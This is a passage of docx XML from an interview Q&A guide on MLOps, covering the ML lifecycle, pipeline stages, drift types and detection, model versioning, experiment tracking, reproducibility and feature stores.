    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM angle of the question. Start with the expected configuration, command, workflow, or troubleshooting principle. For hands-on assessment questions, state the exact file or command shape first, then explain the key fields, validation step, and common mistakes to avoid. Use the prompt details as acceptance criteria: Agentic systems: For a multi-step, tool-calling agent pipeline, how would you design observability, failure handling, and guardrails so a bad tool call or infinite loop doesn't cause damage or runaway cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>MLOps Fundamentals (1–100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1613. Why is MLOps important in production ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MLOps is important in production ML systems because building a model is only a small part of the overall lifecycle. In real-world environments, models need to be deployed, scaled, monitored, retrained, and maintained continuously.</w:t>
        <w:br/>
        <w:t>MLOps helps automate and standardize this entire process, making ML systems more reliable, scalable, and reproducible. It improves collaboration between data science, DevOps, and engineering teams while reducing manual effort and deployment time.</w:t>
        <w:br/>
        <w:t>It also helps solve production challenges such as:</w:t>
        <w:br/>
        <w:t>* Model versioning and reproducibility</w:t>
        <w:br/>
        <w:t>* Automated CI/CD for ML pipelines</w:t>
        <w:br/>
        <w:t>* Monitoring model performance and drift</w:t>
        <w:br/>
        <w:t>* Infrastructure scaling using Kubernetes or cloud platforms</w:t>
        <w:br/>
        <w:t>* Faster and safer deployments</w:t>
        <w:br/>
        <w:t>* Governance, security, and rollback management</w:t>
        <w:br/>
        <w:t>Overall, MLOps ensures that ML models can operate efficiently and reliably in production environments at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1614. Explain the ML lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Machine Learning lifecycle is the end-to-end process of building, deploying, and maintaining machine learning models in production.</w:t>
        <w:br/>
        <w:t>It typically includes the following stages:</w:t>
        <w:br/>
        <w:t>1. Data Collection – Gathering data from databases, APIs, logs, or other sources.</w:t>
        <w:br/>
        <w:t>2. Data Preparation &amp; Cleaning – Removing inconsistencies, handling missing values, and transforming data into a usable format.</w:t>
        <w:br/>
        <w:t>3. Feature Engineering – Creating meaningful input features that improve model performance.</w:t>
        <w:br/>
        <w:t>4. Model Training – Training ML models using algorithms on prepared datasets.</w:t>
        <w:br/>
        <w:t>5. Model Evaluation – Validating model accuracy and performance using metrics like accuracy, precision, recall, or RMSE.</w:t>
        <w:br/>
        <w:t>6. Experiment Tracking &amp; Versioning – Tracking datasets, parameters, metrics, and model versions for reproducibility.</w:t>
        <w:br/>
        <w:t>7. Model Deployment – Deploying the trained model to production using APIs, containers, or Kubernetes platforms.</w:t>
        <w:br/>
        <w:t>8. Monitoring &amp; Logging – Monitoring prediction accuracy, latency, drift, failures, and resource usage in production.</w:t>
        <w:br/>
        <w:t>9. Model Retraining – Retraining models periodically when data changes or model performance degrades.</w:t>
        <w:br/>
        <w:t>10. Continuous Improvement – Updating pipelines, features, and infrastructure for better scalability and reliability.</w:t>
        <w:br/>
        <w:t>In MLOps, the goal is to automate and standardize this lifecycle using CI/CD pipelines, monitoring tools, and cloud-native infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1615. What are the stages of an ML pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An ML pipeline is a sequence of automated steps used to build, train, deploy, and maintain machine learning models efficiently.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The common stages of an ML pipeline are:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Data Ingestion – Collecting data from sources like databases, APIs, logs, or cloud storage.</w:t>
        <w:br/>
        <w:t>2. Data Validation – Checking data quality, schema consistency, missing values, and anomalies.</w:t>
        <w:br/>
        <w:t>3. Data Preprocessing – Cleaning, transforming, normalizing, and preparing data for training.</w:t>
        <w:br/>
        <w:t>4. Feature Engineering – Creating and selecting important features for better model performance.</w:t>
        <w:br/>
        <w:t>5. Model Training – Training ML models using algorithms and training datasets.</w:t>
        <w:br/>
        <w:t>6. Model Evaluation – Evaluating the model using performance metrics such as accuracy, precision, recall, F1-score, or RMSE.</w:t>
        <w:br/>
        <w:t>7. Model Validation – Comparing the trained model against baseline or production models before approval.</w:t>
        <w:br/>
        <w:t>8. Model Packaging &amp; Registry – Storing versioned models in a model registry for reproducibility and governance.</w:t>
        <w:br/>
        <w:t>9. Model Deployment – Deploying models to production environments using APIs, containers, or Kubernetes.</w:t>
        <w:br/>
        <w:t>10. Monitoring &amp; Logging – Monitoring model performance, latency, prediction quality, and detecting model drift.</w:t>
        <w:br/>
        <w:t>11. Retraining &amp; Continuous Delivery – Automatically retraining and redeploying models when performance degrades or new data becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1616. Difference between DevOps and MLOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DevOps focuses on automating and managing the software development lifecycle, while MLOps extends DevOps practices to machine learning systems by managing both code and ML models along with data.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In DevOps, the main focus is on:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Application development and deployment</w:t>
        <w:br/>
        <w:t>* CI/CD automation</w:t>
        <w:br/>
        <w:t>* Infrastructure management</w:t>
        <w:br/>
        <w:t>* Monitoring and scaling applications</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, additional challenges are involved such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data versioning</w:t>
        <w:br/>
        <w:t>* Model training and retraining</w:t>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Model drift detection</w:t>
        <w:br/>
        <w:t>* Feature engineering</w:t>
        <w:br/>
        <w:t>* ML pipeline orchestration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>DevOps mainly handles deterministic software behavior, whereas MLOps deals with probabilistic models whose performance can change over time based on data.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Another key difference is that in DevOps, code changes trigger deployments, but in MLOps, both code changes and data changes can trigger retraining and redeployment of models.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In short, MLOps is an extension of DevOps specifically designed for managing the complete machine learning lifecycle in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1617. What is model drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model drift is the degradation of a machine learning model’s performance over time because the data patterns in production change compared to the data used during training.</w:t>
        <w:br/>
        <w:t>In simple terms, the model was trained on one type of data distribution, but real-world data evolves, causing prediction accuracy to decrease.</w:t>
        <w:br/>
        <w:t>There are mainly two common types of drift:</w:t>
        <w:br/>
        <w:t>1. Data Drift (Feature Drift) – The input data distribution changes.</w:t>
        <w:br/>
        <w:t>Example: Customer behavior changes over time.</w:t>
        <w:br/>
        <w:t>2. Concept Drift – The relationship between input data and target output changes.</w:t>
        <w:br/>
        <w:t>Example: Fraud patterns changing in banking systems.</w:t>
        <w:br/>
        <w:t>Model drift is important in production because even a highly accurate model can become unreliable if not continuously monitored.</w:t>
        <w:br/>
        <w:t>In MLOps, drift detection is usually handled using monitoring tools, statistical checks, performance metrics, and automated retraining pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1618. What is data drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Data drift, also called feature drift, occurs when the distribution or pattern of input data changes over time compared to the data used during model training.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Because of this change, the model may receive unfamiliar or different data in production, which can reduce prediction accuracy and overall model performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If a recommendation model was trained on customer behavior from last year, but user preferences change over time, the incoming production data may no longer match the training data distribution.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common causes of data drift include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Changes in user behavior</w:t>
        <w:br/>
        <w:t>* Seasonal trends</w:t>
        <w:br/>
        <w:t>* Market changes</w:t>
        <w:br/>
        <w:t>* New data sources</w:t>
        <w:br/>
        <w:t>* Sensor or application changes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, data drift is detected using monitoring tools, statistical tests, and data quality checks, and it often triggers model retraining or pipeline updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1619. What is concept drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Concept drift occurs when the relationship between input data and the target output changes over time, causing the machine learning model’s predictions to become less accurate.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In simple terms, the model may still receive similar data, but the meaning or behavior behind that data changes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In a fraud detection system, fraud patterns and attacker behavior may evolve over time. A model trained on old fraud patterns may fail to detect new types of fraud.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Concept drift is important because the model logic itself becomes outdated even if the input data format remains the same.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, concept drift is handled through continuous monitoring, performance tracking, drift detection techniques, and periodic model retraining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1620. How do you detect drift in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In production, drift is detected by continuously monitoring both input data distributions and model performance metrics over time.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For data drift, we compare production data with training data using statistical methods such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* PSI (Population Stability Index)</w:t>
        <w:br/>
        <w:t>* KL Divergence</w:t>
        <w:br/>
        <w:t>* Kolmogorov–Smirnov Test</w:t>
        <w:br/>
        <w:t>* Distribution comparison and feature statistics</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>We monitor features like mean, variance, null values, category distribution, and data patterns.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For concept drift, we monitor model performance metrics such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Accuracy</w:t>
        <w:br/>
        <w:t>* Precision/Recall</w:t>
        <w:br/>
        <w:t>* F1-score</w:t>
        <w:br/>
        <w:t>* Prediction confidence</w:t>
        <w:br/>
        <w:t>* Error rates</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If these metrics degrade significantly compared to baseline performance, it may indicate concept drift.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production environments, we usually implement automated monitoring pipelines using tools like:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prometheus￼</w:t>
        <w:br/>
        <w:t>* Grafana￼</w:t>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:t>* Evidently AI￼</w:t>
        <w:br/>
        <w:t>* WhyLabs￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Once drift crosses a threshold, alerts are triggered, and automated retraining or rollback workflows can be initiated through MLOps pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1621. What tools are used for drift monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common tools used for drift monitoring in MLOps are:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Evidently AI￼ — Used for data drift, concept drift, data quality, and ML monitoring dashboards.</w:t>
        <w:br/>
        <w:t>* WhyLabs￼ — Enterprise ML observability platform for monitoring drift, anomalies, and model performance.</w:t>
        <w:br/>
        <w:t>* MLflow￼ — Used for experiment tracking, model versioning, and integrating monitoring workflows.</w:t>
        <w:br/>
        <w:t>* Prometheus￼ +  Grafana￼ — Commonly used for infrastructure, latency, custom ML metrics, and alert monitoring.</w:t>
        <w:br/>
        <w:t>* Amazon SageMaker Model Monitor￼ — AWS-native service for monitoring data quality and model drift.</w:t>
        <w:br/>
        <w:t>* Google Cloud Vertex AI Model Monitoring￼ — GCP service for monitoring skew, drift, and prediction quality.</w:t>
        <w:br/>
        <w:t>* Arize AI￼ — Advanced ML observability platform for production model monitoring and root-cause analysis.</w:t>
        <w:br/>
        <w:t>* Fiddler AI￼ — Used for explainability, fairness, drift detection, and model performance monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In real production environments, teams often combine ML-specific monitoring tools with traditional observability stacks like Prometheus, Grafana, Elasticsearch, and cloud-native monitoring services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1622. Explain model versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model versioning is the process of tracking and managing different versions of machine learning models throughout their lifecycle.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps maintain reproducibility, traceability, and governance by storing details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model artifacts</w:t>
        <w:br/>
        <w:t>* Training datasets</w:t>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Code versions</w:t>
        <w:br/>
        <w:t>* Performance metrics</w:t>
        <w:br/>
        <w:t>* Environment configurations</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production, model versioning is important because multiple versions of a model may exist for experimentation, testing, rollback, or retraining purposes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For example, if a newly deployed model performs poorly in production, we can quickly roll back to a previous stable version.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Model versioning also helps teams compare model performance, track changes, and ensure compliance and auditability in enterprise environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used for model versioning include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:t>* DVC￼</w:t>
        <w:br/>
        <w:t>* Kubeflow￼</w:t>
        <w:br/>
        <w:t>* Weights &amp; Biases￼</w:t>
        <w:br/>
        <w:t>* Amazon SageMaker Model Registry￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typically, versioning is integrated with CI/CD pipelines and model registries as part of an MLOps workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1623. What is experiment tracking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Experiment tracking is the process of recording and managing machine learning experiments to track how different models perform under various configurations.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps store and compare details such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Training datasets</w:t>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Model versions</w:t>
        <w:br/>
        <w:t>* Source code versions</w:t>
        <w:br/>
        <w:t>* Evaluation metrics</w:t>
        <w:br/>
        <w:t>* Training environment details</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The main goal of experiment tracking is reproducibility and comparison, so teams can identify which experiment produced the best-performing model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML environments, multiple experiments are usually performed with different algorithms, parameters, or feature sets. Without experiment tracking, it becomes difficult to reproduce results or understand why a particular model performed better.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used for experiment tracking include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:t>* Weights &amp; Biases￼</w:t>
        <w:br/>
        <w:t>* Neptune AI￼</w:t>
        <w:br/>
        <w:t>* Kubeflow￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Experiment tracking is a key part of MLOps because it improves collaboration, reproducibility, governance, and model lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1624. Explain ML reproducibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML reproducibility means the ability to consistently reproduce the same machine learning results using the same data, code, configuration, and environment.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In simple terms, if another engineer runs the same ML pipeline with the same inputs, they should get the same model performance and outputs.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Reproducibility is important in production because ML systems involve multiple changing components such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Training data</w:t>
        <w:br/>
        <w:t>* Feature engineering logic</w:t>
        <w:br/>
        <w:t>* Hyperparameters</w:t>
        <w:br/>
        <w:t>* Model versions</w:t>
        <w:br/>
        <w:t>* Library dependencies</w:t>
        <w:br/>
        <w:t>* Infrastructure environments</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Without reproducibility, debugging, auditing, retraining, and rollback become very difficult.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, reproducibility is achieved using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Version control for code and datasets</w:t>
        <w:br/>
        <w:t>* Model versioning</w:t>
        <w:br/>
        <w:t>* Experiment tracking</w:t>
        <w:br/>
        <w:t>* Containerization using  Docker￼</w:t>
        <w:br/>
        <w:t>* Infrastructure as Code</w:t>
        <w:br/>
        <w:t>* CI/CD automation</w:t>
        <w:br/>
        <w:t>* Dependency management</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools used for reproducibility include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:t>* DVC￼</w:t>
        <w:br/>
        <w:t>* Kubeflow￼</w:t>
        <w:br/>
        <w:t>* Git￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Reproducibility is one of the core principles of reliable and production-ready MLOps systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1625. What is feature engineering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature engineering is the process of selecting, transforming, and creating meaningful input variables, called features, from raw data to improve machine learning model performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal is to make the data more useful and understandable for the ML algorithm so the model can learn patterns more effectively.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common feature engineering techniques include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Handling missing values</w:t>
        <w:br/>
        <w:t>* Encoding categorical variables</w:t>
        <w:br/>
        <w:t>* Normalization and scaling</w:t>
        <w:br/>
        <w:t>* Feature extraction</w:t>
        <w:br/>
        <w:t>* Feature selection</w:t>
        <w:br/>
        <w:t>* Creating derived features</w:t>
        <w:br/>
        <w:t>* Date and time transformations</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>From a timestamp field, we can create features like:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Day of week</w:t>
        <w:br/>
        <w:t>* Month</w:t>
        <w:br/>
        <w:t>* Weekend indicator</w:t>
        <w:br/>
        <w:t>* Peak hour flag</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML systems, feature engineering is very important because model accuracy often depends more on data quality and features than on the algorithm itself.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, feature engineering pipelines are usually automated and version-controlled to maintain consistency between training and production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1626. What is feature store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A feature store is a centralized system used to store, manage, version, and serve machine learning features for both training and production environments.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps ensure consistency between the features used during model training and the features used during real-time inference.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A feature store typically provides:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Centralized feature management</w:t>
        <w:br/>
        <w:t>* Feature reuse across teams</w:t>
        <w:br/>
        <w:t>* Online and offline feature serving</w:t>
        <w:br/>
        <w:t>* Feature versioning</w:t>
        <w:br/>
        <w:t>* Data consistency and governance</w:t>
        <w:br/>
        <w:t>* Low-latency access for real-time predictions</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML systems, feature stores solve common problems such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Duplicate feature engineering efforts</w:t>
        <w:br/>
        <w:t>* Training-serving skew</w:t>
        <w:br/>
        <w:t>* Inconsistent feature calculations</w:t>
        <w:br/>
        <w:t>* Difficulty managing large-scale feature pipelines</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Customer-related features like purchase history, login frequency, or average transaction amount can be stored once and reused across multiple ML models.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular feature store tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Feast￼</w:t>
        <w:br/>
        <w:t>* Tecton￼</w:t>
        <w:br/>
        <w:t>* Hopsworks￼</w:t>
        <w:br/>
        <w:t>* Databricks Feature Store￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, feature stores are important for scalability, reproducibility, and maintaining reliable ML pipelines in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1627. Explain offline vs online features.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Offline features are features stored and used mainly for model training and batch processing, while online features are low-latency features used during real-time inference in production.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Offline Features:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Stored in data lakes, warehouses, or batch storage systems</w:t>
        <w:br/>
        <w:t>* Used for model training, analytics, and historical processing</w:t>
        <w:br/>
        <w:t>* Handle large volumes of historical data</w:t>
        <w:br/>
        <w:t>* Optimized for throughput rather than low latency</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Historical customer transactions stored in BigQuery or S3 for training recommendation models.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Online Features:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Stored in low-latency databases or in-memory systems</w:t>
        <w:br/>
        <w:t>* Used during real-time predictions</w:t>
        <w:br/>
        <w:t>* Optimized for fast read access</w:t>
        <w:br/>
        <w:t>* Continuously updated with live data</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Current user session activity or recent clickstream data used during live recommendation inference.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML systems, both online and offline features should remain consistent to avoid training-serving skew.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Feature stores usually manage both:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Offline store → for training datasets</w:t>
        <w:br/>
        <w:t>* Online store → for real-time serving</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This architecture helps maintain scalability, consistency, and reliable model performance in MLOps environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1628. What is batch inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
